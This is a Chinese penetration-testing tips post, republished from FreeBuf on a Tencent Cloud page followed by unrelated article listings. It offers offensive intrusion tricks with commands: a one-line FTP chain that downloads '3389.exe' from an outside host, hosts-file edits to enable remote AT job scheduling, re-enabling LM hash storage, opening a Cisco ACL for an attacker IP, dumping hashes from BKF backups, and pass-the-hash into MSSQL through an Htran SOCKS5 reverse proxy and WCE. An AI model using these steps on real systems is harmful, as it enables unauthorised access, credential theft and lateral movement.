渗透测试技巧分享

1.AT時提示綁定句柄無效

經常碰到的這個問題,百度搜索的全部都沒一個能解決的。

正確的解決辦法是先在地址欄\\1.1.1.1 得到對方機器名,例如ADMINPC,然後,CMD

echo 1.1.1.1 ADMINPC >>C:\windows\system32\drivers\etc\hosts 

然後就可以at了,再也不會提示句柄無效了。

後記:其實也不需要對方的機器名,隨便echo 一個字符代替機器名即可。

2.ftp 一句話download

以前都是一個一個echo,然後ftp-s,很不方便,用下面的辦法吧

echo open 10.0.0.1> o&echo user 11>> o &echo get 3389.exe>> o &echo quit >> o &ftp -n -s:o &del /F /Q o

3.針對VISTA以上作業系統禁用NTHASH

高級系統默認都是禁止了LMHASH,在滲透途中是件很不方便的事,按照下圖可以啟動LMHASH,不過需要更改密碼后生效,如果用戶不更改密碼,LMHASH不會儲存,適用于比較敏感的目標,沒事天天改密碼的類型。這辦法適用於無WCE的時代.

捕获.gif(缩略图)

4. 修改cisco access list 避免繁瑣的”佛跳牆”過程

ssh 登陸IP,x.x.x.x

登陸

en IPE_CISCO#show access-list 查看下要配置的list 例如需要訪問的服務器在VLAN103 IPE_CISCO#config IPE_CISCO#terminal IPE_CISCO#access-list 103 permit host 10.1.6.66 //允許這個IP訪問VLAN103所有的伺服器 IPE_CISCO#int vlan 103 IPE_CISCO#ip access-group 103 out IPE_CISCO#exit

5.BKF文件的利用

Webshell 環境下,提權無門,發現一BKF,Copy Downlaod,虛擬機還原,WINPE 替換shift,get hash

然後去試試目標的pass.

6.基於替換系統hash的SQL 入侵

已知目標系統HASH:

administrator:zhu:00000000000000000000000000000000:4A59CF37F6xxxxxx

系統OS:2003,SQLSERVER 2008,目測該hash超過14位。(2003 默認為LMHASH,密碼超過14位則全000000000或者AA3DXXX)

已有webshell,提權無門,則通過Htran 反彈一條sock5代理,本地WCE替換為目標HASH,使用sock5代理連接MSSQL,認證選擇NT。

連上,完成。

7.注意Command.com

這個命令存在很久了在遙遠的WIN95~WIN2003一直存在著,一直被忽略的對象,其實,它也能替代CMD。

8.當ipc$遇到帶“號密碼時

password is:O*"#~)GbU[x net use \\127.0.0.1 "O*\"#~)GbU[x" /u:administrator

“號前加\即可解決問題。

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2013-03-18

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏别先生

org.apache.zookeeper.KeeperException$ConnectionLossException: KeeperErrorCode = ConnectionLoss for /

1:如果有一天,你有幸看到了这个错误,也许你像我一样low,因为此时,你已经准备开发Zookeeper程序了,却还没有把Zookeeper的服务启动起来。 1...

47280
来自专栏软件

SQL Server 2016軟件下載及安裝教程

SQL Server 2016(64位)下载地址: 链接:http://pan.baidu.com/s/1c2vWkKg 密码:tjxq 安装中有问题咨询客服微...

27750
来自专栏wOw的Android小站

[Android][Framework] 无障碍快捷方式相关代码

问题:无障碍快捷方式(Accessibility Shortcut)打开不生效。

32810
来自专栏乐沙弥的世界

Oracle Net Services - Tracing and Logging at a Glance

    Oracle Net trace 用于跟踪或调试oracle连接故障,连接异常断开或者连接超时等情形,通过产生详细的跟踪信息来进行分析和诊断Oracle...

7530
来自专栏乐沙弥的世界

使用 SQLNET.EXPIRE_TIME 清除僵死连接

    数据库连接的客户端异常断开后,其占有的相应并没有被释放,如从v$session视图中依旧可以看到对应的session处于inactive,且对应的服务器...

32620
来自专栏技术小讲堂

LINQ to SQL(2):生成对象模型

在LINQ to SQL中,可以使用自己的编程语言的对象模型映射到关系数据库,在上一节课,已经有一部分内容,简单的介绍了一下这种对象模型的结构,这一节,我们主要...

29340
来自专栏向治洪

android PakageManagerService启动流程分析

PakageManagerService的启动流程图 ? 1.PakageManagerService概述 PakageManagerService是andro...

566100
来自专栏互联网杂技

Express.js 4.0 有加入一個新的 Router 功能

Express.js 4.0 有加入一個新的 Router 功能,它就像一個迷你的應用程式,可以讓應用程式內部的路由撰寫更方便、更有彈性。 Express.js...

27670
来自专栏搜云库

Apache Hive-2.3.0 快速搭建与使用

Hive 简介 Hive 是一个基于 hadoop 的开源数据仓库工具,用于存储和处理海量结构化数据。它把海量数据存储于 hadoop 文件系统,而不是数据库,...

46760
来自专栏技术之路

visual studio 2012 的制作ActiveX、打包和发布

开发环境是Vs 2012  Framework 4.0 源码和制作工具在文章最下边 一. ActiveX控件Demo 新建一个Window窗体控件库项目 ? 在...

21490

扫码关注云+社区

领取腾讯云代金券